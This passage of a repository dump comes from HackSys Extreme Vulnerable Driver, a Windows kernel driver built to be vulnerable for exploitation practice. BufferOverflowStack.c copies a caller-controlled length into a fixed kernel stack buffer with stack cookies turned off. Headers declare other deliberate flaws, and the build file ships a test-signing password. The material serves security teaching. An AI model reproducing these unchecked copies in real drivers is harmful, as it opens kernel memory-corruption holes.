6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see https://www.gnu.org/licenses/.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | BufferOverflowPagedPoolSession.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | buffer overflow in PagedPoolSession module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __BUFFER_OVERFLOW_PAGED_POOL_SESSION_H__
54 | #define __BUFFER_OVERFLOW_PAGED_POOL_SESSION_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Defines
61 | //
62 |
//
// Size in bytes of the PagedPoolSession allocation this module works with.
// Unlike the NonPagedPoolNx variant this value is not architecture dependent;
// the reason is in BufferOverflowPagedPoolSession.c (not in view).
//
#define POOL_BUFFER_SIZE 504
64 |
65 |
66 | //
67 | // Function Definitions
68 | //
69 |
//
// Implemented in BufferOverflowPagedPoolSession.c (not in view). By its naming
// UserBuffer is a user-mode pointer and Size the caller's length, so both are
// untrusted on entry and must be validated by the implementation.
//
NTSTATUS
TriggerBufferOverflowPagedPoolSession(
    _In_ PVOID UserBuffer,
    _In_ SIZE_T Size
);
75 |
76 | #endif // !__BUFFER_OVERFLOW_PAGED_POOL_SESSION_H__
77 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/BufferOverflowStack.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see https://www.gnu.org/licenses/.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | BufferOverflowStack.c
44 |
45 | Abstract:
46 | This module implements the functions to demonstrate
47 | buffer overflow in Stack vulnerability.
48 |
49 | --*/
50 |
51 | #include "BufferOverflowStack.h"
52 |
//
// Both routines of this module are placed in the pageable PAGE section.
// Each of them calls PAGED_CODE() on entry so that running at an IRQL where
// paging is not allowed is caught on checked builds.
//
#ifdef ALLOC_PRAGMA
#pragma alloc_text(PAGE, TriggerBufferOverflowStack)
#pragma alloc_text(PAGE, BufferOverflowStackIoctlHandler)
#endif // ALLOC_PRAGMA
57 |
58 |
///
/// Trigger the buffer overflow in Stack Vulnerability
///
/// Copies the caller's user-mode buffer into a fixed-size ULONG array on the
/// kernel stack. A SECURE build copies exactly sizeof(KernelBuffer) bytes;
/// the default build copies the caller-controlled Size, which is the
/// intentional defect this module demonstrates.
///
/// UserBuffer - The pointer to user mode buffer, handed through unchanged from
///              Type3InputBuffer by the IOCTL handler below
/// Size       - Size of the user mode buffer, i.e. the IOCTL's
///              InputBufferLength, so it is caller-controlled
/// Returns    - NTSTATUS: STATUS_SUCCESS, or the SEH exception code if the
///              probe or the copy raised
///
/// __declspec(safebuffers) opts this function out of the /GS stack cookie,
/// so the compiler's stack protector does not interfere with the
/// demonstration. BUFFER_SIZE comes from Common.h (not in view).
///
__declspec(safebuffers)
NTSTATUS
TriggerBufferOverflowStack(
    _In_ PVOID UserBuffer,
    _In_ SIZE_T Size
)
{
    NTSTATUS Status = STATUS_SUCCESS;
    ULONG KernelBuffer[BUFFER_SIZE] = { 0 };

    //
    // Pageable routine (see the alloc_text pragma at the top of the file);
    // assert that the current IRQL permits that.
    //
    PAGED_CODE();

    __try
    {
        //
        // Verify if the buffer resides in user mode
        //
        // Note: only sizeof(KernelBuffer) bytes are probed, not Size. In the
        // vulnerable build the copy below may therefore read beyond the range
        // that was checked here; any resulting fault lands in the __except.
        //

        ProbeForRead(UserBuffer, sizeof(KernelBuffer), (ULONG)__alignof(UCHAR));

        DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
        DbgPrint("[+] UserBuffer Size: 0x%zX\n", Size);
        DbgPrint("[+] KernelBuffer: 0x%p\n", &KernelBuffer);
        DbgPrint("[+] KernelBuffer Size: 0x%zX\n", sizeof(KernelBuffer));

#ifdef SECURE
        //
        // Secure Note: This is secure because the developer is passing a size
        // equal to size of KernelBuffer to RtlCopyMemory()/memcpy(). Hence,
        // there will be no overflow
        //

        RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, sizeof(KernelBuffer));
#else
        DbgPrint("[+] Triggering Buffer Overflow in Stack\n");

        //
        // Vulnerability Note: This is a vanilla Stack based Overflow vulnerability
        // because the developer is passing the user supplied size directly to
        // RtlCopyMemory()/memcpy() without validating if the size is greater or
        // equal to the size of KernelBuffer
        //
        // The fix is the SECURE branch above: bound the copy length by the
        // destination size (or reject Size > sizeof(KernelBuffer) outright).
        //

        RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, Size);
#endif
    }
    __except (EXCEPTION_EXECUTE_HANDLER)
    {
        //
        // Any access violation raised by the probe or the copy ends up here;
        // the exception code is handed back to the caller as the NTSTATUS.
        //
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}
119 |
120 |
///
/// Buffer Overflow Stack Ioctl Handler
///
/// Dispatches the stack-overflow IOCTL: takes the caller's input pointer and
/// length from the I/O stack location and forwards them unchanged to
/// TriggerBufferOverflowStack(). A NULL input pointer is rejected with
/// STATUS_UNSUCCESSFUL; the length is not inspected here.
///
/// Irp     - The pointer to IRP (not used by this handler)
/// IrpSp   - The pointer to IO_STACK_LOCATION structure
/// Returns - NTSTATUS from TriggerBufferOverflowStack(), or
///           STATUS_UNSUCCESSFUL when no input buffer was supplied
///
NTSTATUS
BufferOverflowStackIoctlHandler(
    _In_ PIRP Irp,
    _In_ PIO_STACK_LOCATION IrpSp
)
{
    PVOID InputBuffer;
    SIZE_T InputLength;

    UNREFERENCED_PARAMETER(Irp);
    PAGED_CODE();

    //
    // Type3InputBuffer carries the caller's pointer straight through, so at
    // this point it is still an untrusted user-mode address; the callee is
    // responsible for probing it.
    //
    InputBuffer = IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;
    InputLength = IrpSp->Parameters.DeviceIoControl.InputBufferLength;

    if (InputBuffer == NULL)
    {
        return STATUS_UNSUCCESSFUL;
    }

    return TriggerBufferOverflowStack(InputBuffer, InputLength);
}
150 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/BufferOverflowStack.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see https://www.gnu.org/licenses/.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | BufferOverflowStack.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | buffer overflow in Stack module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __BUFFER_OVERFLOW_STACK_H__
54 | #define __BUFFER_OVERFLOW_STACK_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Function Definitions
61 | //
62 |
//
// Defined in BufferOverflowStack.c. Copies UserBuffer into a fixed-size array
// on the kernel stack; unless SECURE is defined the caller-controlled Size is
// used as the copy length, which is the defect that module demonstrates.
//
NTSTATUS
TriggerBufferOverflowStack(
    _In_ PVOID UserBuffer,
    _In_ SIZE_T Size
);
68 |
69 | #endif // !__BUFFER_OVERFLOW_STACK_H__
70 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/BufferOverflowStackGS.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see https://www.gnu.org/licenses/.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | BufferOverflowStackGS.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | buffer overflow in Stack with Guard Stack (GS) module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __BUFFER_OVERFLOW_STACK_GS_H__
54 | #define __BUFFER_OVERFLOW_STACK_GS_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Function Definitions
61 | //
62 |
//
// Guard Stack (/GS) variant of the stack overflow module; implemented in
// BufferOverflowStackGS.c (not in view). Same contract as the plain stack
// module: UserBuffer is a user-mode pointer and Size the caller's length.
//
NTSTATUS
TriggerBufferOverflowStackGS(
    _In_ PVOID UserBuffer,
    _In_ SIZE_T Size
);
68 |
69 | #endif // !__BUFFER_OVERFLOW_STACK_GS_H__
70 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/CMakeLists.txt:
--------------------------------------------------------------------------------
1 |
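#
# HEVD (Windows) driver target.
#
# SECURE is a configure-time switch: when set, every module is compiled with
# -DSECURE and takes its "Secure Note" branch instead of the intentionally
# vulnerable one.
#
if(SECURE)
    add_definitions(-DSECURE)
    message("Generating secure HEVD build configuration")
else()
    message("Generating vulnerable HEVD build configuration")
endif()

#
# Test-signing material. HEVD.pfx and its password ship with this repository,
# so anything signed with them is only as trustworthy as a self-signed test
# certificate; it should only ever be trusted on lab machines. Both values are
# exposed as cache variables so that a build can substitute its own
# certificate without editing this file. The defaults keep the historical
# values, so existing build scripts are unaffected.
#
set(HEVD_PFX_FILE "HEVD.pfx" CACHE FILEPATH "PFX used to test-sign HEVD.sys")
set(HEVD_PFX_PASSWORD "Passw0rd!" CACHE STRING "Password for HEVD_PFX_FILE")
mark_as_advanced(HEVD_PFX_PASSWORD)

wdk_add_driver(HEVD
    WDM
    1.15
    PFX_FILE
    ${HEVD_PFX_FILE}
    PFX_PASSWORD
    ${HEVD_PFX_PASSWORD}
    HackSysExtremeVulnerableDriver.c
    ArbitraryReadWriteHelperNonPagedPoolNx.c
    ArbitraryWrite.c
    BufferOverflowNonPagedPool.c
    BufferOverflowNonPagedPoolNx.c
    BufferOverflowPagedPoolSession.c
    BufferOverflowStack.c
    BufferOverflowStackGS.c
    DoubleFetch.c
    InsecureKernelResourceAccess.c
    IntegerOverflow.c
    MemoryDisclosureNonPagedPool.c
    MemoryDisclosureNonPagedPoolNx.c
    NullPointerDereference.c
    TypeConfusion.c
    UninitializedMemoryPagedPool.c
    UninitializedMemoryStack.c
    UseAfterFreeNonPagedPool.c
    UseAfterFreeNonPagedPoolNx.c
    WriteNULL.c
    ArbitraryIncrement.c
)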
39 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/DoubleFetch.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see https://www.gnu.org/licenses/.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | DoubleFetch.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | double fetch module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __DOUBLE_FETCH_H__
54 | #define __DOUBLE_FETCH_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
//
// Descriptor the caller passes to the double fetch module. TriggerDoubleFetch()
// (declared below) receives a pointer to one of these named UserDoubleFetch,
// so both fields presumably live in user-mode memory and can change between
// two kernel reads — confirm against DoubleFetch.c (not in view).
//
typedef struct _DOUBLE_FETCH
{
    PVOID Buffer;   // caller's data pointer
    SIZE_T Size;    // caller's length for Buffer
} DOUBLE_FETCH, *PDOUBLE_FETCH;
68 |
69 |
70 | //
71 | // Function Definitions
72 | //
73 |
//
// Implemented in DoubleFetch.c (not in view). UserDoubleFetch is, by its
// naming, a user-mode pointer to a DOUBLE_FETCH (above), so the structure and
// everything it points to are untrusted and may change while being read.
//
NTSTATUS
TriggerDoubleFetch(
    _In_ PDOUBLE_FETCH UserDoubleFetch
);
78 |
79 | #endif // !__DOUBLE_FETCH_H__
80 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/HEVD.inf:
--------------------------------------------------------------------------------
;
; HEVD.inf
;
; Install and service definition for the HackSys Extreme Vulnerable Driver.
; The driver is intentionally vulnerable; this INF is meant for lab machines.
;

[Version]
Signature = "$WINDOWS NT$"
Class = System
ClassGuid = {4d36e97d-e325-11ce-bfc1-08002be10318}
Provider = %ManufacturerName%
CatalogFile = HEVD.cat
; DriverVer is left empty here; presumably stamped by the build — confirm.
DriverVer =

[DestinationDirs]
DefaultDestDir = 10 ; %SystemRoot%

[SourceDisksNames]
1 = %DiskName%,,,""

[SourceDisksFiles]
HEVD.sys = 1,,

;*****************************************
; HEVD driver install sections
;*****************************************

[DefaultInstall]
OptionDesc = %ServiceDesc%
CopyFiles = HEVD.DriverFiles

; Copied into %SystemRoot% (DirId 10) without a version comparison.
[HEVD.DriverFiles]
HEVD.sys,,,0x00000004 ; COPYFLG_NOVERSIONCHECK

;*****************************************
; HEVD service install sections
;*****************************************

[DefaultInstall.Services]
AddService = %ServiceName%,,HEVD.ServiceInstall

[HEVD.ServiceInstall]
DisplayName = %ServiceName%
Description = %ServiceDesc%
ServiceBinary = %10%\HEVD.sys
ServiceType = 1 ; SERVICE_KERNEL_DRIVER
StartType = 3 ; SERVICE_DEMAND_START (SERVICE_AUTO_START would be 2)
ErrorControl = 1 ; SERVICE_ERROR_NORMAL

;*****************************************
; Strings Section
;*****************************************

[Strings]
ManufacturerName = "HackSys Team"
DiskName = "HEVD Installation Disk"
ServiceName = "HEVD"
ServiceDesc = "HackSys Extreme Vulnerable Driver Service"
57 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/HEVD.pfx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Driver/HEVD/Windows/HEVD.pfx
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/InsecureKernelResourceAccess.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see https://www.gnu.org/licenses/.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | InsecureKernelResourceAccess.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | insecure kernel resource access module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __INSECURE_KERNEL_RESOURCE_ACCESS_H__
54 | #define __INSECURE_KERNEL_RESOURCE_ACCESS_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Function Definitions
61 | //
62 |
//
// Implemented in InsecureKernelResourceAccess.c (not in view). Takes no caller
// input. Note the function name says FileAccess while the header and module
// are named ResourceAccess.
//
NTSTATUS
TriggerInsecureKernelFileAccess(
    VOID
);
67 |
68 | #endif // !__INSECURE_KERNEL_RESOURCE_ACCESS_H__
69 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/IntegerOverflow.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see https://www.gnu.org/licenses/.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | IntegerOverflow.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | integer overflow (arithmetic overflow) module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __INTEGER_OVERFLOW_H__
54 | #define __INTEGER_OVERFLOW_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Function Definitions
61 | //
62 |
//
// Implemented in IntegerOverflow.c (not in view). UserBuffer is, by its naming,
// a user-mode pointer. Size is a 32-bit ULONG here, unlike the SIZE_T used by
// the sibling modules — presumably the quantity whose arithmetic is made to
// wrap; confirm against the .c.
//
NTSTATUS
TriggerIntegerOverflow(
    _In_ PVOID UserBuffer,
    _In_ ULONG Size
);
68 |
69 | #endif // !__INTEGER_OVERFLOW_H__
70 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/MemoryDisclosureNonPagedPool.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
